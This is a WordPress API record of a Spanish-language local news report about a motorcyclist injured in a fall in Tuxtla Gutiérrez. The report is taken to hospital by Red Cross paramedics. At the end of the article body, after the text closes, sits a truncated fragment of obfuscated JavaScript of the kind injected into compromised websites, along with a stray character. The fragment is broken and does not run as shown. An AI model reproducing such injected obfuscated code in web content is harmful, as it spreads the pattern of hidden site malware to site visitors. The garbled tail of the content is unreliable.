{"id":14105,"date":"2024-02-12T01:37:13","date_gmt":"2024-02-12T01:37:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14105"},"modified":"2024-02-12T01:37:14","modified_gmt":"2024-02-12T01:37:14","slug":"motociclista-termina-herido-al-caer-de-su-unidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14105","title":{"rendered":"Motociclista termina herido al caer de su unidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707701808296-1024x461.jpg\" alt=\"\" class=\"wp-image-14106\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707701808296-1024x461.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707701808296-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707701808296-768x346.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707701808296.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 11 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Con diferentes lesiones termin\u00f3 un motociclista al caer de su unidad cuando circulaba en la 17 Avenida de la Colonia Bel\u00e9n a la altura de la Calle Belisario Dom\u00ednguez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 la madrugada de este domingo cuando Issac de 36 a\u00f1os de edad, perdi\u00f3 el control por causas desconocidas, y cay\u00f3 provoc\u00e1ndose heridas en la cabeza.Algunos testigos inmediatamente llamaron a los n\u00fameros de emergencias y param\u00e9dicos de la Cruz Roja Mexicana para atender al lesionado y trasladarlo al hospital IMSS 5 de Mayo para su atenci\u00f3n m\u00e9dica especializada.La motocicleta no fue encontrada en el lugar de los hechos por los familiares del lesionado.\u0137<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 11 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Con diferentes lesiones termin\u00f3 un motociclista al caer de su unidad cuando circulaba en la 17 Avenida de la Colonia Bel\u00e9n a la altura de la Calle Belisario Dom\u00ednguez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 la madrugada de este domingo cuando Issac de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14106,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14105","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14105"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14105\/revisions"}],"predecessor-version":[{"id":14107,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14105\/revisions\/14107"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14106"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14105"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}